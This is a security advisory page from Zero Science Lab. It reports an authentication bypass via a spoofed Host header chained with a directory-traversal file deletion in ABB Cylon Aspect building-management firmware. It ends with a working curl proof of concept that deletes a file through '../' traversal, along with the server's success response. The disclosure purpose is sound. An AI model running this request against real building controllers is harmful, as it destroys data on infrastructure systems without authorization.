ABB Cylon Aspect 3.08.03 (MIX->HTTPDownloadServlet) File Deletion

May 23, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title ABB Cylon Aspect 3.08.03 (MIX->HTTPDownloadServlet) File Deletion
Exploit ID ZSL-2025-5942
Type zeroscience
Published 2025-05-22T00:00:00
Modified 2025-05-22T00:00:00

CVSS Information

CVSS Score 0.0
Severity NONE
Vector NONE

CVE Information

Exploit Description

Title: ABB Cylon Aspect 3.08.03 (MIX->HTTPDownloadServlet) File Deletion Advisory ID: ZSL-2025-5942 Type: Local/Remote Impact: Security Bypass, Manipulation of Data,…

Exploit Code

ABB Cylon Aspect 3.08.03 (MIX->HTTPDownloadServlet) File Deletion

Vendor: ABB Ltd.

Product web page: https://www.global.abb

Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio

Firmware: <=3.08.03

Summary: ASPECT is an award-winning scalable building energy management

and control solution designed to allow users seamless access to their

building data through standard building protocols including smart devices.

Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the

AuthenticatedHttpServlet within its application server, enabling

remote attackers to bypass authentication by setting the Host:

127.0.0.1 header. This deceives the server into processing requests

as if they originate from localhost, granting unauthorized access

to privileged operations. This bypass grants access to privileged

functionality, including the HTTPDownloadServlet, which is vulnerable

to directory traversal. By leveraging this, an attacker can delete

arbitrary PHP files outside the intended directory scope.

Tested on: GNU/Linux 3.15.10 (armv7l)

GNU/Linux 3.10.0 (x86_64)

GNU/Linux 2.6.32 (x86_64)

Intel(R) Atom(TM) Processor E3930 @ 1.30GHz

Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz

PHP/7.3.11

PHP/5.6.30

PHP/5.4.16

PHP/4.4.8

PHP/5.3.3

AspectFT Automation Application Server

lighttpd/1.4.32

lighttpd/1.4.18

Apache/2.2.15 (CentOS)

OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)

OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

ErgoTech MIX Deployment Server 2.0.0

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic

@zeroscience

Advisory ID: ZSL-2025-5942

Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5942.php

21.04.2024

$ cat project

P R O J E C T

.|

| |

|’| ._____

___ | | |. |’ .—“|

_ .-‘ ‘-. | | .–‘| || | _| |

.-‘| _.| | || ‘-__ | | | || |

|’ | |. | || | | | | || |

____| ‘-‘ ‘ “” ‘-‘ ‘-.’ ‘` |____

░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░

░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░

$ curl http://192.168.73.31:7226/servlets/HTTPDownloadServlet \

> –data-urlencode “delete=../../../home/judy/smack/myass.tiff” \

> -H “Host: localhost”

200 Successful200 Successful

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.